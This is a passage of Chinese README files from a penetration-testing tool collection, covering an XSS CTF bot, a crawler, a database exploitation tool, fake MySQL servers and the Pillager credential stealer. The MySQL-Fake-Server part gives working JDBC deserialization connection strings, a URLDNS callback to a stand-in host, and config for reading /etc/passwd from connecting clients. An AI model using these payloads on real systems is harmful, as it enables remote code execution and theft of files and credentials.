**警告**:清除的数据中包含密码记录,即浏览器的密码管理器的记录。如果你使用浏览器自带的密码管理器和Google账号进行密码记录和维护,清除浏览器的密码管理器记录可能导致Google账号同步的密码被置空。再次建议将攻击主机和日常使用的主机分离,不在攻击主机上登录或保存任何私人有关的账号。 78 | 79 | #### 特征对抗配置-WebRTC 防IP泄露严格策略 80 | 81 | - 建议设置:安装后手动开启该选项 82 | 83 | > 通过提高WebRTC策略严格度防止真实IP泄露,已知Chrome v104(截至2022.9.1)仍存在该漏洞,此选项可在并建议在日常使用时也开启 84 | > 请勿将此策略与其他WebRTC防护插件(如WebRTC Control或WebRTC Leak Prevent)同时使用,各插件调节WebRTC策略会互相干涉,暂停其他插件的使用时的API调用也会影响Heimdallr的调节逻辑。 85 | 86 | #### 特征对抗配置-Canves噪点干扰脚本注入 87 | 88 | - 建议设置:攻击期间开启,日常使用时关闭 89 | 90 | > 通过对当前网页注入内容脚本增加Canvas画布噪点防止特征锁定,开启后所有网页访问时将会额外加载content.js用于画布类的函数hook操作 91 | 92 | 93 | 94 | ## 🔔高级 95 | 96 | 1. 插件的识别对象基于【标签页】,标签页页面变更【(域名+端口)或(IP+端口)】时清空结果,切换标签页时结果会暂存,关闭标签页或窗口时删除对应结果。 97 | 2. 插件默认只存在被动流量监控,不会因为敏感指纹的识别触发防火墙处置。 98 | 3. 插件识别结果为页面及页面子框架的请求内容,部分页面告警【请求体数据为json格式】、【请求头Content-Type为application/json格式】时,不一定是当前document的请求,有可能是当前document页加载的相关页面的接口请求匹配了规则. 99 | 4. 因为谷歌Chrome API的安全限制和Chrome内核的历史遗留问题,插件对响应体Body的检查与其他指纹位置的检查不同,浏览器页面顶部会出现调试提示,可通过插件设置关闭响应包检查功能或添加谷歌浏览器的启动项规避提示(在Chrome快捷方式右键打开属性,在快捷方式栏的【目标】框添加启动参数 `--silent-debugger-extension-api`)。 100 | 5. 插件目的为发现直接访问无法识别的组件或框架,请勿添加可以直接识别的组件的特征到指纹库(如spark未授权页面),增加无意义的识别流程导致识别负担增加。 101 | 102 | 103 | ## 🎇继续开发 104 | 105 | #### 新增指纹 106 | 107 | 在实战中遇到有意义的高危指纹特征或未在拦截列表中的蜜罐请求特征都可以打开新的issue提交,作者会尽快在验证可用性后将指纹添加到新的版本中。 108 | 109 | #### 二次开发 110 | 111 | Vue3前端模块 112 | 113 | ``` 114 | cd Vue_popup\heimdallr_v3 115 | npm install 116 | npm run build:watch 117 | vim src\App.vue 118 | ``` 119 | 120 | chrome插件模块 121 | 122 | ``` 123 | cd .\Heimdallr\ 124 | ``` 125 | 126 | 指纹模块 127 | 128 | ``` 129 | cd .\Heimdallr\resource\data 130 | vim data.js 131 | ``` 132 | 133 | 134 | ## 项目相关 135 | 136 | 137 | ## 最近更新 138 | 139 | 140 | -------------------------------------------------------------------------------- /detail/LBot.md: -------------------------------------------------------------------------------- 1 | ## LBot 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-LoRexxar@knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/LBot.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20200921-green) 8 | 9 | 10 | 11 | LBot的基础模型是脱胎于LSpider诞生的多线程任务调度模型。 12 | 13 | 主要是用于方便的写一个xss的bot程序。 14 | 15 | 使用者可以简单的修改其逻辑以及配置环境,即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序,所以只要前端有一定的频率限制,后端很难出现问题,比较稳定。 16 | 17 | # install 18 | 19 | ## 下载Lbot 20 | 21 | ``` 22 | git clone https://github.com/knownsec/LBot.git 23 | ``` 24 | 25 | ## 修改配置文件 26 | 27 | ``` 28 | cp LBot/settings.py.bak LBot/settings.py 29 | ``` 30 | 31 | 并配置其中相关的mysql配置 32 | 33 | ``` 34 | DATABASES = { 35 | 'default': { 36 | 'ENGINE': 'django.db.backends.mysql', 37 | 'NAME': 'disable', 38 | 'USER': 'root', 39 | 'PASSWORD': '', 40 | 'HOST': '127.0.0.1', 41 | 'PORT': '3306', 42 | 'OPTIONS': { 43 | 'init_command': 'SET default_storage_engine=INNODB;SET NAMES utf8mb4', 44 | 'charset': 'utf8mb4', 45 | }, 46 | 'TEST': { 47 | 'CHARSET': 'utf8', 48 | 'COLLATION': 'utf8_general_ci', 49 | }, 50 | } 51 | } 52 | ``` 53 | ## 配置环境 54 | 55 | ``` 56 | python3 -m pip install django 57 | ``` 58 | 59 | 如果mysqlclient无法安装,还需要提前安装 60 | 61 | ``` 62 | sudo apt-get install libmysqlclient-dev 63 | ``` 64 | 65 | ## 同步数据库配置 66 | 67 | ``` 68 | python3 manage.py makemigrations 69 | python3 manage.py migrate 70 | ``` 71 | 72 | ## 配置chrome headless 73 | 74 | ``` 75 | sudo wget http://www.linuxidc.com/files/repo/google-chrome.list -P /etc/apt/sources.list.d/ 76 | 77 | wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add - 78 | 79 | sudo apt-get update 80 | 81 | sudo apt-get install google-chrome-stable 82 | ``` 83 | 84 | 看一下chrome的版本 85 | 86 | ```bash 87 | lorexxar@instance-1:~/lorexxar/lspider/LSpider$ google-chrome --version 88 | Google Chrome 81.0.4044.138 89 | ``` 90 | 91 | 去官网下载对应版本的webdriver放在bin目录下 92 | 93 | ``` 94 | https://chromedriver.chromium.org/downloads 95 | ``` 96 | 97 | 修改名字 98 | ```bash 99 | mv bin/chromedriver bin/chromedriver_linux64 100 | 101 | ``` 102 | 103 | ## 针对守护的xss题目魔改bot程序 104 | 105 | 主流的xss bot守护方式一共有两种,一种是依靠cookie或者ip限制bot访问,另一种是通过登录账号模拟管理员的bot。 106 | 107 | ``` 108 | # Bot admin pass 109 | CTF_BACK_USER = 'admin' 110 | CTF_BACK_PASS = 'adminsecretpass' 111 | CTF_BACK_COOKIE = "s3cr3t_k3y_f0r_4dmin" 112 | ``` 113 | 114 | 如果是依赖cookie的需要设置HOME_PAGE 115 | ``` 116 | # homepage 117 | 118 | HOME_PAGE = "http://127.0.0.1/index.php" 119 | ``` 120 | 121 | 核心bot部分主要在`Botend\views.py` function `LBotCore` 122 | 123 | ``` 124 | reportt = ReportTask.objects.filter(aread=0).first() 125 | 126 | if not reportt: 127 | continue 128 | 129 | # 任务锁 130 | reportt.aread = 1 131 | reportt.save() 132 | 133 | # cookie 方式 134 | report_url = reportt.url 135 | cookies = "admin="+CTF_BACK_COOKIE 136 | 137 | self.req = LReq(is_chrome=True) 138 | 139 | # 访问目标 140 | self.req.get(report_url, 'RespByChrome', 0, cookies) 141 | 142 | ``` 143 | 144 | 145 | # usage 146 | 147 | ``` 148 | python3 manage.py LBotCoreBackend 149 | ``` 150 | 151 | 152 | 153 | ## 项目相关 154 | 155 | 156 | ## 最近更新 157 | 158 | 159 | -------------------------------------------------------------------------------- /detail/LSpider.md: -------------------------------------------------------------------------------- 1 | ## LSpider 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-LoRexxar-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/LSpider.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.2-red) 7 | ![Time](https://img.shields.io/badge/Join-20200821-green) 8 | 9 | 10 | 11 | # LSpider 12 | 13 | LSpider - 一个为被动扫描器定制的前端爬虫 14 | 15 | # 什么是LSpider? 16 | 17 | 一款为被动扫描器而生的前端爬虫~ 18 | 19 | 由Chrome Headless、LSpider主控、Mysql数据库、RabbitMQ、被动扫描器5部分组合而成。 20 | 21 | (1) 建立在Chrome Headless基础上,将模拟点击和触发事件作为核心原理,通过设置代理将流量导出到被动扫描器。 22 | 23 | (2) 通过内置任务+子域名api来进行发散式的爬取,目的经可能的触发对应目标域的流量。 24 | 25 | (3) 通过RabbitMQ来进行任务管理,支持大量线程同时任务。 26 | 27 | (4) 智能填充表单,提交表单等。 28 | 29 | (5) 通过一些方式智能判断登录框,并反馈给使用者,使用者可以通过添加cookie的方式来完成登录。 30 | 31 | (6) 定制了相应的Webhook接口,以供Webhook统计发送到微信。 32 | 33 | (7) 内置了Hackerone、bugcrowd爬虫,提供账号的情况下可以一键获取某个目标的所有范围。 34 | 35 | ### 为什么选择LSpider? 36 | 37 | LSpider是专门为被动扫描器定制的爬虫,许多功能都是为被动扫描器而服务的。 38 | 39 | 建立在RabbitMQ的任务管理系统相当稳定,可以长期在无人监管的情况下进行发散式的爬取。 40 | 41 | ### LSpider的最佳实践是什么? 42 | 43 | **服务器1(2c4g以上)**: Nginx + Mysql + Mysql管理界面(phpmyadmin) 44 | 45 | 将被动扫描器的输出位置设置为web路径下,这样可以通过Web同时管理结果以及任务。 46 | 47 | LSpider部署5线程以上,设置代理连接被动扫描器(被动扫描器可以设置专门的漏扫代理) 48 | 49 | **服务器2**(非必要,但如果部署在服务器1,那么就需要更好的配置):RabbitMQ 50 | 51 | ### 还有什么问题? 52 | 53 | LSpider从设计之初是为了配合像xray这种被动扫描器而诞生的,但可惜的是,在工具发展的过程中,深刻认识到爬虫是无法和被动扫描器拆分开来的。 54 | 55 | 强行将应该在被动扫描器实现的功能在爬虫端实现简直是舍本逐末,所以我们发起了另一个被动扫描器项目,如果有机会,后续还会开源出来给大家。 56 | 57 | ### 设计思路? 58 | 59 | [为被动扫描器量身打造一款爬虫-LSpider](https://lorexxar.cn/2021/01/28/lspider-design/) 60 | 61 | # Usage 62 | 63 | [安装&使用](https://github.com/knownsec/LSpider/blob/master/docs/init.md) 64 | 65 | 你可以通过下面的命令来测试是否安装成功 66 | 67 | ``` 68 | python3 manage.py SpiderCoreBackendStart --test 69 | ``` 70 | 71 | 通过dockerfile安装(不推荐的安装模式) 72 | ``` 73 | cd ./docker 74 | 75 | docker-compose up -d 76 | ``` 77 | 78 | [dockerfile 安装&使用](https://github.com/knownsec/LSpider/blob/master/docker/readme.md) 79 | 80 | **使用dockerfile安装,推荐修改其中必要的配置信息以避免安全漏洞诞生。** 81 | 82 | **值得注意的是,以下脚本可能会涉及到项目路径影响,使用前请修改相应的配置** 83 | 84 | 建议配合screen来挂起进程 85 | 86 | 启动LSpider webhook 与漏洞展示页面(默认端口2062) 87 | 88 | ``` 89 | ./lspider_webhook.sh 90 | ``` 91 | 92 | 启动LSpider 93 | ``` 94 | ./lspider_start.sh 95 | ``` 96 | 97 | 完全关闭LSpider 98 | ``` 99 | ./lspider_stop.sh 100 | ``` 101 | 102 | 启动被动扫描器 103 | ``` 104 | ./xray.sh 105 | ``` 106 | 107 | # 一些关键的配置 108 | 109 | [配置说明](https://github.com/knownsec/LSpider/blob/master/docs/config.md) 110 | 111 | # 如何配置扫描任务 以及 其他的配置相关 112 | 113 | 其中包含了如何配置扫描任务、鉴权信息、webhook。 114 | 115 | 值得注意的是,文中提到的Cookie配置,格式为浏览器请求包复制即可。 116 | 117 | [如何配置扫描任务 以及 其他的配置相关](https://github.com/knownsec/LSpider/blob/master/docs/manage.md) 118 | 119 | 扫描器结果输出到配置文件相同目录(默认为vuls/),则可以通过web界面访问。 120 | 121 | ![](https://github.com/knownsec/LSpider/raw/master/docs/6.png) 122 | 123 | # 使用内置的hackerone、bugcrowd爬虫获取目标 124 | 125 | 使用hackerone爬虫,你需要首先配置好hackerone账号 126 | ``` 127 | python3 .\manage.py HackeroneSpider {appname} 128 | ``` 129 | ![](https://github.com/knownsec/LSpider/raw/master/docs/4.png) 130 | 131 | 同理,bugcrowd使用 132 | ``` 133 | python3 .\manage.py BugcrowdSpider {appname} 134 | ``` 135 | 136 | ![](https://github.com/knownsec/LSpider/raw/master/docs/5.png) 137 | 138 | 139 | 140 | ## 项目相关 141 | 142 | - 2021-01-28 发布文章[《为被动扫描器量身打造一款爬虫 - LSpider》](https://paper.seebug.org/1473/) 143 | 144 | ## 最近更新 145 | 146 | 147 | -------------------------------------------------------------------------------- /detail/MDUT.md: -------------------------------------------------------------------------------- 1 | ## MDUT 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-Ch1ngg-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/SafeGroceryStore/MDUT.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V2.1.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20210702-green) 8 | 9 | 10 | 11 | MDUT 全称 Multiple Database Utilization Tools,是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型。基于前人 SQLTOOLS 的基础开发了这套程序(向 SQLTOOLS 致敬),旨在将常见的数据库利用手段集合在一个程序中,打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂。此外工具以 JAVAFx 作为 GUI 操作界面,界面美观。同时程序还支持多数据库同时操作,每种数据库都相互独立,极大方便了网络安全工作者的使用。 12 | 13 | ## 截图 14 | ![image.png](https://i.loli.net/2021/05/11/c1M6YqZNAOnjmfp.png) 15 | 16 | ## 目录结构 17 | ``` 18 | . 19 | ├── CHANGELOG.md 20 | ├── MDAT-DEV // MDUT 源码 21 | ├── MDUTSqlKit 22 | │ └── MDATKit.zip // CLR 源码 23 | ├── README.md 24 | ├── README_ZH.md 25 | ├── redis-cus-rogue.py // Redis 主从脚本 26 | ├── ShellUtil.java // Oracle JAVA 脚本 27 | └── FileUtil.java // Oracle JAVA 脚本 28 | 29 | ``` 30 | 31 | ## TODO 32 | 1. HTTP Tunnel 33 | 34 | ## 致谢 35 | [j1anFen](https://jianfensec.com/) / [冰蝎](https://github.com/rebeyond/Behinder) / [ODAT](https://github.com/quentinhardy/odat) / [MSDAT](https://github.com/quentinhardy/msdat) / SQLTOOLS - 深度撞击 36 | / [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) / [WarSQLKit](https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit) 37 | 38 | 39 | ## 项目相关 40 | 41 | 42 | ## 最近更新 43 | 44 | #### [v2.1.1] - 2022-06-22 45 | 46 | **核心** 47 | - 优化逻辑代码 48 | - 更改用户协议窗口 49 | - 重构 Http Tunnel 生成界面 50 | 51 | **Mysql** 52 | - 修正 Mysql 某些时候错误不弹窗 53 | 54 | **Mssql** 55 | - 将依赖包重新替换为 jTDS (Microsoft 官方驱动太多问题) 56 | 57 | **Oracle** 58 | - 增加oracle 单独上传功能 59 | 60 | **Redis** 61 | - 优化内部代码 62 | - 再次修复 Redis 测试连接错误信息返回连接成功 Bug 63 | - 增加反弹shell功能 (不推荐使用影响生产环境) 64 | - 修复 Redis 某些时候错误不弹窗 65 | - 增强 替换 SSH 公钥 功能 66 | 67 | #### [v2.1.0] - 2022-05-24 68 | 69 | **核心** 70 | - 增加 HTTP 隧道功能(Redis暂不支持) 71 | - 优化逻辑代码 72 | - 加长默认超时时间 73 | 74 | **Mssql** 75 | - 修复下载文件 Bug 76 | - 删除获取管理员密码功能 77 | - 增加一键恢复所有组件功能 78 | - 修正 CLR Hex String 79 | 80 | **Oracle** 81 | - 更改 JAVA Util 导入方式 82 | - 优化 JAVA ShellUtil 代码 83 | 84 | **Redis** 85 | - 添加 slave-read-only 功能 86 | 87 | #### [v2.0.8] - 2021-12-01 88 | 89 | **核心** 90 | - 修复 Mssql 连接 2000 时候的语句兼容性问题 91 | - 设置程序默认编码 92 | - 删除敏感文件(详细说明情况请看文档里的公告一栏) 93 | 94 | #### [v2.0.6] - 2021-08-17 95 | 96 | **核心** 97 | - 优化内部代码 98 | - 删除软件自启更新功能 99 | - 优化更新功能界面,增加在线下载更新功能(Github Api) 100 | - 后续不再强制要求先下载 v2.0 版,下载即用 101 | 102 | 103 | -------------------------------------------------------------------------------- /detail/MySQL-Fake-Server.md: -------------------------------------------------------------------------------- 1 | ## MySQL-Fake-Server 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-fnmsd-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/fnmsd/MySQL_Fake_Server.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20211122-green) 8 | 9 | 10 | 11 | 用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包。 12 | 13 | 修改自项目 14 | 15 | ## 用途 16 | 17 | 1. MySQL服务端读取客户端文件漏洞利用 18 | 2. MySQL JDBC客户端Java反序列化漏洞利用 19 | 20 | ## 说明 21 | 1. 需要python3环境,无任何其它依赖。 22 | 2. 运行:`python server.py` 23 | 3. 需要[ysoserial](https://github.com/frohoff/ysoserial)才能用反序列化功能,支持`ServerStatusDiffInterceptor`和`detectCustomCollations`两种方式。 24 | 4. MySQL的用户名支持冒号、斜杠等特殊符号,但是能否使用还需看具体客户端环境。 25 | 5. 根据 **登录用户名** 返回文件读取利用报文、反序列化利用报文。 26 | 6. **推荐用法:** config.json中预置了一部分配置信息,可以自己修改添加指定用户名对应的读取文件和yso参数,详细看下面的说明 27 | 28 | ## 测试环境: 29 | 1. jdk1.8.20+mysql-connector-java 8.0.14/5.1.22(Windows下反序列化(JRE8u20)、文件读取) 30 | 2. PHPMyAdmin(Windows+Linux文件读取,可以使用相对路径读取php文件内容) 31 | 3. Navicat 12(Windows下文件读取,需要切换到mysql_clear_password认证插件) 32 | 33 | ## 使用方法 34 | 默认的config.json: 35 | 36 | ```json 37 | { 38 | "config":{ 39 | "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar", //YsoSerial位置 40 | "javaBinPath":"java",//java运行命令位置 41 | "fileOutputDir":"./fileOutput/",//读取文件的保存目录 42 | "displayFileContentOnScreen":true,//是否输出文件内容预览到控制台 43 | "saveToFile":true//是否保存文件 44 | }, 45 | //文件读取参数 46 | "fileread":{ 47 | "win_ini":"c:\\windows\\win.ini",//key为设定的用户名,value为要读取的文件路径 48 | "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts", 49 | "win":"c:\\windows\\", 50 | "linux_passwd":"/etc/passwd", 51 | "linux_hosts":"/etc/hosts", 52 | "index_php":"index.php", 53 | "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]//未知用户名情况下随机选择文件读取 54 | 55 | }, 56 | //ysoserial参数 57 | "yso":{ 58 | "Jdk7u21":["Jdk7u21","calc"]//key为设定的用户名,value为ysoserial参数的参数 59 | } 60 | } 61 | ``` 62 | 63 | 1. 文件读取: 64 | 65 | - 可以在config.json中fileread节中预定义好要读取的文件(比如win_ini用户名读取win.ini文件) 66 | - 可以用fileread_开头的用户名(例如使用用户名fileread\_/etc/passwd来读取/etc/passwd文件) 67 | 68 | 2. 反序列化 69 | - 可在config.json中yso节预定义好yso payload的生成参数(比如Jdk7u21用户名返回Jdk7u21执行计算器的gadget) 70 | 71 | - 可以用yso_开头的用户名,格式yso\_payload类型\_命令(例如jdk7u21调用calc就使用用户名yso\_Jdk7u21\_calc) 72 | 73 | jdbc连接串示例: 74 | - `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc` 75 | - `jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/` 76 | 77 | 3. 关于认证:默认认证插件一般使用**mysql_native_password**,但是由于协议实现的问题,navicat下会连接失败,此时在使用的用户名后追加 **_clear** 即可切换为mysql_clear_password,navicat连接成功,读取到文件。 78 | 79 | - **例如:** fileread\_/etc/passwd_clear 80 | 81 | ## JDBC连接串整理 82 | 83 | 写分析的时候整理了一下: 84 | 用户名请参考上面的说明进行修改。 85 | 86 | ### ServerStatusDiffInterceptor触发 87 | 88 | - **8.x:** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc` 89 | 90 | - **6.x(属性名不同):** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc` 91 | 92 | - **5.1.11及以上的5.x版本(包名没有了cj):**` jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc` 93 | 94 | - **5.1.10及以下的5.1.X版本:** 同上,但是需要连接后执行查询。 95 | 96 | - **5.0.x:** 还没有`ServerStatusDiffInterceptor`这个东西┓( ´∀` )┏ 97 | 98 | ### detectCustomCollations触发: 99 | 100 | - **5.1.41及以上:** 不可用 101 | 102 | - **5.1.29-5.1.40:** `jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc` 103 | 104 | - **5.1.28-5.1.19:** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc` 105 | 106 | - **5.1.18以下的5.1.x版本:** 不可用 107 | 108 | - **5.0.x版本不可用** 109 | 110 | ## 效果 111 | 112 | Navicat文件读取(用户名使用win_ini_clear) 113 | 114 | ![image-20200414150112426](https://github.com/fnmsd/MySQL_Fake_Server/raw/master/README.assets/image-20200414150112426.png) 115 | 116 | JDK 1.8.20+mysql-connector-java 8.0.14反序列化,使用用户名:yso_JRE8u20_calc 117 | 118 | ![image-20200414150417471](https://github.com/fnmsd/MySQL_Fake_Server/raw/master/README.assets/image-20200414150417471.png) 119 | 120 | ## 踩过的坑 121 | 122 | 1. SHOW VARIABLES 相关 123 | - 会读取两列,所以需要返回两列,否则会报错。 124 | - JDBC连接的时候回通过调用`SHOW VARIABLES`获取服务器变量,其中最重要的是两个时区变量`system_time_zone`和`time_zone`,在getObject过程,会调用到时区相关信息,没有这两个会直接报错 125 | 2. jdbc的Blob判定条件除了字段类型为blob,还要求字段声明的org_table字段不为空,flags大于128,否则会被当做text进行解析。(com.mysql.cj.protocol.a.NativeProtocol的findMysqlType方法) 126 | 3. 原python-mysqlproto中的序列检测需要去掉,否则会出错(这个应该是哪里处理有问题导致了序号重置)。 127 | 4. `SHOW SESSION STATUS`和`SHOW COLLATION`的公用列是第二列 128 | 5. mysql java connector 5.x的环境下,需要返回的server版本大于等于5.0.0才会走到`Util.resultSetToMap`进入getObject 129 | 130 | 131 | 132 | ## 项目相关 133 | 134 | 135 | ## 最近更新 136 | 137 | 138 | -------------------------------------------------------------------------------- /detail/MySQLMonitor.md: -------------------------------------------------------------------------------- 1 | ## MySQLMonitor 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-TheKingOfDuck-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/TheKingOfDuck/MySQLMonitor.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20201221-green) 8 | 9 | 10 | 11 | **MySQLMonitor**: 12 | 13 | **FileMonitor**: 14 | 15 | ## MySQLMonitor 16 | 17 | MySQL实时监控工具(黑盒测试辅助工具) 18 | 19 | ## 使用: 20 | 21 | ``` 22 | java -jar MySQLMonitor.jar -h 127.0.0.1 -user CoolCat -pass mysqlmonitor 23 | ``` 24 | 25 | ![](https://github.com/TheKingOfDuck/MySQLMonitor/raw/master/img/screenshot.png?raw=true) 26 | 27 | ### 环境: 28 | 在以下环境中运行通过 29 | 30 | | OS | JAVA | MySQL | status | 31 | | --- | --- | --- | --- | 32 | | MacOS | 1.8 | 8.x | ok | 33 | 34 | 35 | 环境下运行通过 36 | 理论上均可运行 如有问题或修改意见 请点击===>[问题反馈](https://github.com/TheKingOfDuck/MySQLMonitor/issues) 37 | 38 | 39 | ## 功能 40 | 41 | * 自动开启MySQL日志 实时显示程序执行过的语句 42 | 43 | * 自动安装依赖 44 | 45 | ### 应用场景: 46 | 47 | 48 | 49 | 50 | ## 项目相关 51 | 52 | 53 | ## 最近更新 54 | 55 | 56 | -------------------------------------------------------------------------------- /detail/MysqlT.md: -------------------------------------------------------------------------------- 1 | ## MysqlT 2 | 3 | ![Language](https://img.shields.io/badge/Language-C%23-blue) 4 | ![Author](https://img.shields.io/badge/Author-BeichenDream-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/BeichenDream/MysqlT.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20210223-green) 8 | 9 | 10 | 11 | MysqlT: 12 | WhetherMysqlSham: 13 | 14 | ## MysqlT 15 | 伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击者 16 | 17 | 当你需要将本地文件上传到服务器时,没有合适的上传器时,也可以使用本软件,小巧玲珑 18 | 19 | 该程序利用了Mysql客户端LoadData的逻辑漏洞 20 | 21 | 与其它软件不同,本软件支持大文件无损传输 22 | 23 | 支持用户验证 24 | 25 | 支持自定义Mysql版本 26 | 27 | 随机的Salt加密,加上用户验证,让攻击者毫无察觉 28 | 29 | Net文件夹是.NET程序只能运行在Windows 30 | 31 | NetCore文件夹是.NET CORE程序可以运行在 Windows,Linux,MAC 32 | 33 | 使用教程:https://www.bilibili.com/video/av53068648/ 34 | 35 | 首次使用请在程序中输入Mysql Help,来查看帮助命令 36 | 37 | 38 | 你可以在程序根目录中的User.data文件,批量添加用户,但用户名不可以重复 39 | 40 | 你可以在程序根目录中的File.data文件,批量添加读取路径,但路径不可以重复 41 | 42 | Logincheck:与MysqlN不同的是MysqlT设置为false,会向客户端发生登录成功 43 | 44 | 退出程序时,建议使用 App Exit命令,这样会保存当前的配置 45 | 46 | 本程序命令行的命令不区分大小写,你可以Mysql Help,也可以mysql help 或MYSQL HELP 47 | 48 | ### 安装教程 49 | .NET CORE windows以及linux与mac SDK下载地址:https://dotnet.microsoft.com/download 50 | 51 | Linux 64位一键安装SDK: curl -sSL -o dotnet.tar.gz https://download.visualstudio.microsoft.com/download/pr/ece856bb-de15-4df3-9677-67cc817ffc1b/521da52132d23deae5400b8e19e23691/dotnet-sdk-2.2.204-linux-x64.tar.gz&&sudo mkdir -p /opt/dotnet && sudo tar zxf dotnet.tar.gz -C /opt/dotnet&&sudo ln -s /opt/dotnet/dotnet /usr/local/bin 52 | 53 | 54 | ## 项目相关 55 | 56 | 57 | ## 最近更新 58 | 59 | 60 | -------------------------------------------------------------------------------- /detail/Pillager.md: -------------------------------------------------------------------------------- 1 | ## Pillager 2 | 3 | ![Language](https://img.shields.io/badge/Language-C#-blue) 4 | ![Author](https://img.shields.io/badge/Author-qwqdanchun-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/qwqdanchun/Pillager.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20231106-green) 8 | 9 | 10 | Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。 11 | 12 | ## 支持 13 | 14 | #### 浏览器 15 | 16 | | 名称 | 书签 | Cookies | 密码 | 历史记录 | Local Storage | Extension Settings | 17 | | :------------ | :--: | :-----: | :--: | :------: | :-----------: | :----------------: | 18 | | IE | ✅ | ❌ | ✅ | ✅ | ❌ | ❌ | 19 | | Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 20 | | Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 21 | | Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 22 | | Chrome SxS | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 23 | | Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 24 | | Brave-Browser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 | 25 | | QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | 26 | | SogouExplorer | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 | 27 | | 360Chrome | ❌ | ✅ | ✅ | ❌ | ✅ | ✅ | 28 | | 360ChromeX | ❌ | ✅ | ✅ | ❌ | ✅ | ✅ | 29 | | Vivaldi | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 30 | | CocCoc | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 31 | | Torch | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 32 | | Kometa | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 33 | | Orbitum | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 34 | | CentBrowser | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 35 | | 7Star | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 36 | | Sputnik | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 37 | | Epic Privacy | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 38 | | Uran | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 39 | | Yandex | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 40 | | Opera | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 41 | | Opera GX | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 42 | | FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ✅ | 43 | 44 | 注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持 45 | 46 | #### 软件 47 | 48 | * 账户接管 49 | * Telegram 50 